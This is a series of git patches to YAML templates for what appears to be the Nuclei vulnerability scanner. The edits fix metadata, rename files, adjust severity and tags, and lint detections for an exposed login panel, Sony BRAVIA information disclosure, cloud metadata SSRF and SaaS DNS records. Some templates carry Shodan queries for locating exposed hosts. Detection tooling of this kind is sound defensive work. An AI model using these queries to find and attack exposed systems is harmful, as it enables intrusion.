b/exposed-panels/Content-Central-Login.yaml @@ -4,6 +4,9 @@ info: name: Content Central Login author: theabhinavgaur severity: info + metdata: + verified: true + shodan-query: http.title:"Content Central Login tags: panel,Content Central requests: From f6e94cd7c4d325a606bdfea471c67db4248cfccb Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:03:26 +0530 Subject: [PATCH 1402/1415] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index 9ea7b85888..9c0a3b1ffc 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -6,7 +6,7 @@ info: severity: info metdata: verified: true - shodan-query: http.title:"Content Central Login + shodan-query: http.title:"Content Central Login" tags: panel,Content Central requests: From 0c7c2e2b06ec92112e5201e0aa8bceec9ef492e9 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:08:58 +0530 Subject: [PATCH 1403/1415] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index 9c0a3b1ffc..a97ab10a7d 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -4,7 +4,7 @@ info: name: Content Central Login author: theabhinavgaur severity: info - metdata: + metadata: verified: true shodan-query: http.title:"Content Central Login" tags: panel,Content Central From 8e87a20c4496166e02632c327fcbdea57d330be2 Mon Sep 17 00:00:00 2001 From: Abhinav Gaur <55808946+theabhinavgaur@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:13:22 +0530 Subject: [PATCH 1404/1415] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index a97ab10a7d..15c349be0d 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -4,9 +4,6 @@ info: name: Content Central Login author: theabhinavgaur severity: info - metadata: - verified: true - shodan-query: http.title:"Content Central Login" tags: panel,Content Central requests: From 3b96837b3ab6268ee29c5848cd1b8b1732c4a622 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:22:04 +0530 Subject: [PATCH 1405/1415] Update Content-Central-Login.yaml --- exposed-panels/Content-Central-Login.yaml | 12 +++++++----- 1 file changed, 7 insertions(+), 5 deletions(-) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/Content-Central-Login.yaml index 15c349be0d..1ac37a23ac 100644 --- a/exposed-panels/Content-Central-Login.yaml +++ b/exposed-panels/Content-Central-Login.yaml @@ -1,16 +1,19 @@ -id: Content-Central-Login +id: content-central-login info: - name: Content Central Login + name: Content Central Login Panel author: theabhinavgaur severity: info - tags: panel,Content Central + metadata: + verified: true + shodan-query: http.title:"Content Central Login" + tags: panel,content-central requests: - method: GET path: - - "{{BaseURL}}/ContentCentral/login.aspx/" - "{{BaseURL}}/login.aspx" + - "{{BaseURL}}/ContentCentral/login.aspx/" matchers-condition: and matchers: @@ -18,7 +21,6 @@ requests: part: body words: - Content Central Login - case-insensitive: true - type: status status: From a9ac67cc9ccea3480166f2297b3f88b451333243 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 02:24:25 +0530 Subject: [PATCH 1406/1415] Update and rename Content-Central-Login.yaml to content-central-login.yaml --- .../{Content-Central-Login.yaml => content-central-login.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposed-panels/{Content-Central-Login.yaml => content-central-login.yaml} (100%) diff --git a/exposed-panels/Content-Central-Login.yaml b/exposed-panels/content-central-login.yaml similarity index 100% rename from exposed-panels/Content-Central-Login.yaml rename to exposed-panels/content-central-login.yaml From 1d3d1ad76e2223f46381b5e78c56f37b8651d59c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 10:50:30 +0530 Subject: [PATCH 1409/1415] Update gpc-json.yaml --- miscellaneous/gpc-json.yaml | 16 +--------------- 1 file changed, 1 insertion(+), 15 deletions(-) diff --git a/miscellaneous/gpc-json.yaml b/miscellaneous/gpc-json.yaml index 0a5fa0a1c7..9212c3fa28 100644 --- a/miscellaneous/gpc-json.yaml +++ b/miscellaneous/gpc-json.yaml @@ -17,13 +17,11 @@ requests: - "{{RootURL}}/gpc.json" stop-at-first-match: true - host-redirects: true - max-redirects: 2 matchers-condition: and matchers: - type: word words: - - "gpc" + - '"gpc"' - type: status status: @@ -34,18 +32,6 @@ requests: - "len(body) <= 1024 && len(body) > 0" extractors: - - type: json - part: body - name: gpc-value - json: - - ".gpc" - - - type: json - part: body - name: gpc-last-update - json: - - ".lastUpdate?" - - type: json part: body name: gpc-version From 99e20791ea40d75d2fa68e558b3d0685b32bafb1 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 10:57:29 +0530 Subject: [PATCH 1410/1415] Update sony-bravia-disclosure.yaml --- misconfiguration/sony-bravia-disclosure.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/misconfiguration/sony-bravia-disclosure.yaml b/misconfiguration/sony-bravia-disclosure.yaml index 99fe66474a..943b241d61 100644 --- a/misconfiguration/sony-bravia-disclosure.yaml +++ b/misconfiguration/sony-bravia-disclosure.yaml @@ -3,13 +3,13 @@ id: sony-bravia-disclosure info: name: Sony BRAVIA Digital Signage 1.7.8 System API Information Disclosure author: geeknik - severity: medium + severity: low description: | The application is vulnerable to sensitive information disclosure vulnerability. An unauthenticated attacker can visit several API endpoints and disclose information running on the device. reference: - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2020-5610.php - https://www.zeroscience.mk/codes/sonybravia_sysinfo.txt - tags: sony,unauth,disclosure + tags: misconfig,sony,unauth,exposure requests: - method: GET From cacf0ef565bad8c4dcf33f7534872874b52db682 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:03:37 +0530 Subject: [PATCH 1411/1415] Update amazon-ec2-ssrf.yaml --- vulnerabilities/amazon/amazon-ec2-ssrf.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml index 3c769f6ce8..43f0522be6 100644 --- a/vulnerabilities/amazon/amazon-ec2-ssrf.yaml +++ b/vulnerabilities/amazon/amazon-ec2-ssrf.yaml @@ -1,7 +1,7 @@ id: amazon-ec2-ssrf info: - name: Amazon EC2 SSRF + name: Amazon EC2 - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical classification: @@ -9,6 +9,7 @@ info: cvss-score: 9.3 cwe-id: CWE-441 metadata: + verified: true shodan-query: "Server: EC2ws" tags: aws,ec2,ssrf,amazon From 916d86ecb5fbc88dc0015240c21dcbc20f055328 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 22 Dec 2022 11:06:01 +0530 Subject: [PATCH 1412/1415] Update digital-ocean-ssrf.yaml --- vulnerabilities/other/digital-ocean-ssrf.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/vulnerabilities/other/digital-ocean-ssrf.yaml b/vulnerabilities/other/digital-ocean-ssrf.yaml index 0f806ae067..17d33e6e1f 100644 --- a/vulnerabilities/other/digital-ocean-ssrf.yaml +++ b/vulnerabilities/other/digital-ocean-ssrf.yaml @@ -1,14 +1,14 @@ id: digital-ocean-ssrf info: - name: Digital Ocean SSRF + name: Digital Ocean - Server-side request forgery (SSRF) author: DhiyaneshDk severity: critical classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:N cvss-score: 9.3 cwe-id: CWE-441 - + tags: digitalocean,ssrf requests: - raw: From dde22eadcb15c882a028faef4ecc94d89d7d5243 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 22 Dec 2022 14:16:09 +0530 Subject: [PATCH 1415/1415] lint fixes --- dns/saas-service-detection.yaml | 10 ++++------ 1 file changed, 4 insertions(+), 6 deletions(-) diff --git a/dns/saas-service-detection.yaml b/dns/saas-service-detection.yaml index 1e624f9e5e..14f59720ac 100644 --- a/dns/saas-service-detection.yaml +++ b/dns/saas-service-detection.yaml @@ -21,9 +21,8 @@ dns: matchers-condition: or matchers: - - type: word - name: O365 + name: ms-office words: - outlook.com - office.com @@ -52,7 +51,7 @@ dns: - "visualstudio.com" - "-msedge.net" - "trafficmanager.net" - + - type: word name: zendesk words: @@ -228,7 +227,7 @@ dns: - type: regex name: Adobe Marketo - regex: + regex: - 'mkto-.{5,8}\.com' - type: word @@ -382,5 +381,4 @@ dns: - type: word name: Oracle Eloqua Marketing words: - - hs.eloqua.com - \ No newline at end of file + - hs.eloqua.com \ No newline at end of file